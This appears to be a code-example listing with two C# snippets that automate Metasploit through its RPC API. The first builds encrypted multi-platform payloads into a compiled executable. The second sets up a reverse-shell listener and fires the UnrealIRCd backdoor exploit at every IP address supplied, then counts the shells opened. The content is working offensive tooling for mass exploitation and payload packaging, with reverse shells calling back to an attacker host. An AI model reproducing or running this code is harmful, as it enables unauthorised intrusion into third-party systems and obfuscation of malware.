Beispiel #1
0
    void HandleClicked(object sender, EventArgs e)
    {
        string   template = string.Empty;
        Assembly asm      = Assembly.GetExecutingAssembly();

        string rsrc = _encrypted.Active ? "MetasploitPayloadUtility.EncryptedTemplate.txt" : "MetasploitPayloadUtility.GeneralTemplate.txt";

        using (StreamReader rdr = new StreamReader(asm.GetManifestResourceStream(rsrc)))
            template = rdr.ReadToEnd();

        string winx64Payload = "payload = new byte[][] {";
        string winx86Payload = winx64Payload;
        string linx86Payload = winx86Payload;
        string linx64Payload = linx86Payload;

        MessageDialog md;

        try {
            if (!_encrypted.Active)
            {
                foreach (var pair in _newPayloads)
                {
                    pair.Value ["Format"] = "csharp";
                    var response = _manager.ExecuteModule("payload", pair.Key, pair.Value);

                    if (response.Count == 6)
                    {
                        md = new MessageDialog(this,
                                               DialogFlags.DestroyWithParent,
                                               MessageType.Warning,
                                               ButtonsType.Close, "Generating payload failed.\n\n" + response["error_message"]);

                        md.Run();
                        md.Destroy();
                        return;
                    }

                    if (pair.Key.StartsWith("linux/x86") || pair.Key.StartsWith("osx/x86"))
                    {
                        linx86Payload += (response ["payload"] as string).Split('=') [1].Replace(";", ",");
                    }
                    else if (pair.Key.StartsWith("linux/x64") || pair.Key.StartsWith("osx/x64"))
                    {
                        linx64Payload += (response ["payload"] as string).Split('=') [1].Replace(";", ",");
                    }
                    else if (pair.Key.StartsWith("windows/x64"))
                    {
                        winx64Payload += (response ["payload"] as string).Split('=') [1].Replace(";", ",");
                    }
                    else                         /*windows x86*/
                    {
                        winx86Payload += (response ["payload"] as string).Split('=') [1].Replace(";", ",");
                    }
                }

                winx64Payload += "};";
                winx86Payload += "};";
                linx64Payload += "};";
                linx86Payload += "};";

                //Console.WriteLine (winx64Payload);
                //Console.WriteLine (winx86Payload);
                //Console.WriteLine (linx64Payload);
                //Console.WriteLine (linx86Payload);
            }
            else
            {
                byte[] parity = new byte[4];
                for (int i = 0; i < 4; i++)
                {
                    parity [i] = Convert.ToByte(Convert.ToInt32(Math.Floor(26 * _random.NextDouble() + 65)));
                }

                foreach (var pair in _newPayloads)
                {
                    pair.Value ["Format"] = "raw";
                    var response = _manager.ExecuteModule("payload", pair.Key, pair.Value);

                    if (response.Count == 6)
                    {
                        md = new MessageDialog(this,
                                               DialogFlags.DestroyWithParent,
                                               MessageType.Warning,
                                               ButtonsType.Close, "Generating payload failed.\n\n" + response["error_message"]);

                        md.Run();
                        md.Destroy();
                        return;
                    }

                    if (pair.Key.StartsWith("linux/x86") || pair.Key.StartsWith("osx/x86"))
                    {
                        byte[] b    = response ["payload"] as byte[];
                        byte[] encb = new byte[b.Length + 4];
                        encb [0] = parity [0];
                        encb [1] = parity [1];
                        encb [2] = parity [2];
                        encb [3] = parity [3];

                        for (int i = 4; i < b.Length; i++)
                        {
                            encb [i] = b [i - 4];
                        }

                        linx86Payload += GetByteArrayString(EncryptData(encb, _random.Next(1023).ToString()));
                    }
                    else if (pair.Key.StartsWith("linux/x64") || pair.Key.StartsWith("osx/x64"))
                    {
                        byte[] b    = response ["payload"] as byte[];
                        byte[] encb = new byte[b.Length + 4];
                        encb [0] = parity [0];
                        encb [1] = parity [1];
                        encb [2] = parity [2];
                        encb [3] = parity [3];

                        for (int i = 4; i < b.Length; i++)
                        {
                            encb [i] = b [i - 4];
                        }
                        linx64Payload += GetByteArrayString(EncryptData(encb, _random.Next(1023).ToString()));
                    }
                    else if (pair.Key.StartsWith("windows/x64"))
                    {
                        byte[] b    = response ["payload"] as byte[];
                        byte[] encb = new byte[b.Length + 4];
                        encb [0] = parity [0];
                        encb [1] = parity [1];
                        encb [2] = parity [2];
                        encb [3] = parity [3];

                        for (int i = 4; i < b.Length; i++)
                        {
                            encb [i] = b [i - 4];
                        }
                        winx64Payload += GetByteArrayString(EncryptData(encb, _random.Next(1023).ToString()));
                    }
                    else                         /*windows x86*/
                    {
                        byte[] b    = response ["payload"] as byte[];
                        byte[] encb = new byte[b.Length + 4];
                        encb [0] = parity [0];
                        encb [1] = parity [1];
                        encb [2] = parity [2];
                        encb [3] = parity [3];

                        for (int i = 4; i < b.Length; i++)
                        {
                            encb [i] = b [i - 4];
                        }
                        winx86Payload += GetByteArrayString(EncryptData(encb, _random.Next(1023).ToString()));
                    }
                }

                winx64Payload += "};";
                winx86Payload += "};";
                linx64Payload += "};";
                linx86Payload += "};";

                //Console.WriteLine (winx64Payload);
                //Console.WriteLine (winx86Payload);
                //Console.WriteLine (linx64Payload);
                //Console.WriteLine (linx86Payload);


                string par = GetByteArrayString(parity);

                template = template.Replace("{{parity}}", par.Remove(par.Length - 1));
            }
        } catch {
            md = new MessageDialog(this,
                                   DialogFlags.DestroyWithParent,
                                   MessageType.Warning,
                                   ButtonsType.Close, "Generating payload failed.\n\nPlease ensure all required (*) options are present and valid.\n\nIf you are sure options are correct, please file a bug.");

            md.Run();
            md.Destroy();
        }

        template = template.Replace("{{lin64}}", linx64Payload);
        template = template.Replace("{{lin86}}", linx86Payload);
        template = template.Replace("{{win64}}", winx64Payload);
        template = template.Replace("{{win86}}", winx86Payload);

        Guid uid = Guid.NewGuid();

        File.WriteAllText(System.IO.Path.GetTempPath() + uid.ToString(), template);

        System.Diagnostics.Process          process   = new System.Diagnostics.Process();
        System.Diagnostics.ProcessStartInfo startInfo = new System.Diagnostics.ProcessStartInfo();

        startInfo.WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden;
        startInfo.FileName    = "gmcs";
        startInfo.Arguments   = System.IO.Path.GetTempPath() + uid.ToString();

        process.StartInfo = startInfo;
        process.Start();

        process.WaitForExit();

        md = new MessageDialog(this,
                               DialogFlags.DestroyWithParent,
                               MessageType.Warning,
                               ButtonsType.Close, "Your binary is located at: " + System.IO.Path.GetTempPath() + uid.ToString() + ".exe");

        md.Run();
        md.Destroy();
    }
Beispiel #2
0
        public static void Main(string[] args)
        {
            using (MetasploitSession session = new MetasploitSession("user", "pass", "http://127.0.0.1:55553/api")) {
                if (string.IsNullOrEmpty(session.Token))
                {
                    throw new Exception("Login failed. Check credentials");
                }

                using (MetasploitManager manager = new MetasploitManager(session)) {
                    Dictionary <string, object> response = null;

                    Dictionary <string, object> blah = new Dictionary <string, object> ();
                    blah ["ExitOnSession"] = "false";
                    blah ["PAYLOAD"]       = "cmd/unix/reverse";
                    blah ["LHOST"]         = "192.168.1.31";
                    blah ["LPORT"]         = "4444";

                    response = manager.ExecuteModule("exploit", "multi/handler", blah);
                    object jobID = response ["job_id"];

                    foreach (string ip in args)
                    {
                        Dictionary <string, object> opts = new Dictionary <string, object> ();
                        opts ["RHOST"] = ip;
                        opts ["DisablePayloadHandler"] = "true";
                        opts ["LHOST"]   = "192.168.1.31";
                        opts ["LPORT"]   = "4444";
                        opts ["PAYLOAD"] = "cmd/unix/reverse";

                        response = manager.ExecuteModule("exploit", "unix/irc/unreal_ircd_3281_backdoor", opts);
                    }

                    response = manager.ListJobs();
                    List <object> vals = new List <object>(response.Values);
                    while (vals.Contains((object)"Exploit: unix/irc/unreal_ircd_3281_backdoor"))
                    {
                        Console.WriteLine("Waiting");
                        System.Threading.Thread.Sleep(6000);
                        response = manager.ListJobs();
                        vals     = new List <object> (response.Values);
                    }


                    response = manager.StopJob(jobID.ToString());
                    response = manager.ListSessions();

                    Console.WriteLine("I popped " + response.Count + " shells. Awesome.");

//					foreach (var pair in response) {
//						string id = pair.Key;
//						Dictionary<string, object> dict = (Dictionary<string, object>)pair.Value;
//						if ((dict["type"] as string) == "shell") {
//							response = manager.WriteToSessionShell(id, "id\n");
//							System.Threading.Thread.Sleep(6000);
//							response = manager.ReadSessionShell(id);
//
//							Console.WriteLine(response["data"]);
//
//							//manager.StopSession(id);
//						}
//					}

                    Dictionary <string, object> bl = manager.GetModuleCompatibleSessions("multi/general/execute");
                    Console.WriteLine("fdsa");
                }
            }
        }